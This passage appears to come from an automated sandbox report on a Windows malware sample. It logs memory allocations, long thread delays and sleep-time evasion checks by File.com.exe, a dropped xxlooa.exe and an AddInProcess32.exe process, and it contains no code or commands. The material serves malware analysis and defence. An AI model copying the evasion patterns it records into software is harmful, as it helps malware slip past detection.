Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 5FF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: C100000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: D100000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2600000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2A70000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4A70000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\File.com.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598441	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598315	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598189	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598842
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594453

Source: C:\Users\user\Desktop\File.com.exe	Window / User API: threadDelayed 1941	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Window / User API: threadDelayed 5998	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Window / User API: threadDelayed 1593	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Window / User API: threadDelayed 7665	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 2005	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 7818	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Window / User API: threadDelayed 2084
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Window / User API: threadDelayed 6380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 1635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 8220

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

API coverage: 5.2 %

Source: C:\Users\user\Desktop\File.com.exe TID: 7520	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe TID: 7348	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe TID: 7372	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 5164	Thread sleep time: -61000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 3716	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 6300	Thread sleep time: -51000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 2060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7372	Thread sleep count: 2005 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7372	Thread sleep count: 7818 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -599782s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -598560s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -598441s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -598315s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -598189s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -595532s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -595282s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -595157s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -595032s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -594907s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -594563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -594313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -594188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7364	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 7508	Thread sleep count: 59 > 30
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 7508	Thread sleep time: -59000s >= -30000s
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 5264	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 2692	Thread sleep count: 2084 > 30
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 2692	Thread sleep count: 6380 > 30
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 5852	Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 5852	Thread sleep time: -52000s >= -30000s
Source: C:\Users\user\AppData\Roaming\xxlooa.exe TID: 7488	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep count: 39 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -599890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 4628	Thread sleep count: 1635 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 4628	Thread sleep count: 8220 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -599781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -599672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -599562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -599453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -599344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -599219s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -599109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -598953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -598842s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -598710s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -598609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -598500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -598390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -598281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -598172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -598062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -597953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -597843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -597734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -597625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -597515s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -597406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -597297s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -597187s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -597078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -596969s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -596854s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -596750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -596640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -596531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7916	Thread sleep time: -596422s >= -30000s
